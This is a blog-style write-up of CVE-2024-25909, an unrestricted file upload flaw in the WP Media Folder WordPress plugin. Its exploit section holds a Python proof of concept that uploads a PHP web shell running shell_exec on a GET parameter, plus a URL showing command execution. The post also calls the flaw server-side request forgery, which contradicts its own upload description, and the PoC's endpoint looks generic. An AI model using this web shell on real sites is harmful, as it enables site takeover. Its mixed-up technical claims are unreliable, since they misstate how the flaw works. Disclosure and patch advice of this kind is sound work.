CVE-2024-25909 - A Deep Dive into the Unrestricted Upload of File with Dangerous Type Vulnerability in JoomUnited WP Media Folder (versions n/a through 5.7.2)

JoomUnited is a popular developer that has created many well-known and widely used plugins for WordPress. One of the most popular plugins is the WP Media Folder, which allows you the flexibility to organize and manage your media files easily within WordPress. However, they recently discovered a vulnerability in this plugin that allows for unrestricted uploads of dangerous files types. This critical security flaw was given the CVE-2024-25909 identifier. In this post, we will examine this vulnerability, how it can be exploited, and how to take appropriate action to protect your website.

Vulnerability Details

The vulnerability present, an Unrestricted Upload of Files with Dangerous Types, allows an attacker to upload a malicious file directly to your website, leading to the possibility of remote code execution and other malicious activities. This is particularly dangerous as it can allow an attacker the ability to take full control of your website. This vulnerability affects WP Media Folder versions n/a through 5.7.2.

Exploit Details

The exploit involves a malicious user taking advantage of the server-side request forgery (SSRF) present in the WP Media Folder plugin. The attacker uploads a file with dangerous executable code, bypassing the checks that are supposed to prevent these types of uploads. The code snippet below demonstrates a simple proof-of-concept:

import requests

target_url = "http://target.com";
file_upload_url = f"{target_url}/wp-admin/admin-ajax.php?action=upload"

# Malicious file contents
file_data = '<?php echo shell_exec($_GET["cmd"]); ?>'

# Upload the malicious file
response = requests.post(
        file_upload_url,
        files={"file": ("exploit.php", file_data, "application/x-php")},
        data={"path": "/"},
    )

The code above uploads a PHP file containing a shell_exec() function to the target WordPress website. Once uploaded, an attacker could execute any command remotely by accessing the file through the site's URL. For example:

http://target.com/wp-content/uploads/exploit.php?cmd=id

Original References

The vulnerability has been responsibly disclosed by the researchers who discovered the vulnerability. You can find more information about this issue at the following links:
1. CVE Details
2. JoomUnited

How to Protect Your Website

To protect your WordPress site from this particular vulnerability, it is highly recommended that you immediately update your WP Media Folder plugin to version 5.7.3 or higher. JoomUnited has already addressed the vulnerability in this version, and upgrading the plugin should resolve the issue.

Moreover, it is essential to adhere to security best practices on your site. Consider using a reputable security plugin, maintaining strong passwords, and regularly backing up your files and databases.

Conclusion

CVE-2024-25909 serves as a critical reminder of the importance of staying current with security updates and being proactive when it comes to protecting your WordPress site. Regularly update all themes and plugins, follow security best practices, and maintain regular backups to ensure the security of your digital assets.

Timeline

Published on: 02/26/2024 16:27:59 UTC
Last modified on: 02/26/2024 16:32:25 UTC